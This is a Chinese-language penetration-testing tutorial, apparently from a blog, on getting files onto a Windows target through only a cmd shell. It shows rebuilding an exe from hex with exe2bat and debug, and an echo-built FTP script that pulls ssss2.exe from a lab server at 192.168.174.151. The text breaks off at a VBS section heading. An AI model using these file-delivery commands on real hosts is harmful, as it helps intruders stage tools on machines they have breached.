0x00 前言
在渗透测试的过程中,常常需要向目标主机上传文件,我在最近的学习测试过程中就碰到了这个问题,要求只能通过cmd shell向目标主机(Windows系统)上传文件,所以本文就对该技巧做一下总结。
0x02 测试环境
OS:Win7 x86
test exe:ssss2.exe,成功运行后输出1
0x03 通用上传方法
1、 debug
debug是一个程序调试工具,功能包括:
直接输入,更改,跟踪,运行汇编语言源程序
观察操作系统的内容
查看ROM BIOS的内容
观察更改RAM内部的设置值
以扇区或文件的方式读写软盘数据
特别的是它还有一个功能可以将十六进制代码转换为可执行文件:
结合本文的目标,思路如下:
把需要上传的exe转换成十六进制hex的形式
通过echo命令将hex代码写入文件
使用debug功能将hex代码还原出exe文件
实际测试:
kali中的exe2bat.exe提供了这个功能,位于/usr/share/windows-binaries
如图
操作步骤:
kali:
[code]
cd /usr/share/windows-binaries
wine exe2bat.exe ssss2.exe ssss2.txt
[/code]
执行后会生成ssss2.txt,将里面的内容复制粘贴到cmd命令行下依次执行
执行后会生成1.dll、123.hex、ssss.exe
如图
注:
exe2bat不支持大于64kb的文件
如图
2、ftp
搭建好ftp服务器:
ip:192.168.174.151
文件:ssss2.exe
按顺序执行如下代码即可通过ftp来下载文件
cmd:
[code]
echo open 192.168.174.151 21> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo ftp>> ftp.txt
echo GET ssss2.exe >> ftp.txt
ftp -s:ftp.txt
[/code]
如图
注:
初次使用ftp下载防火墙会弹框拦截,使用前记得要先添加防火墙规则
3、vbs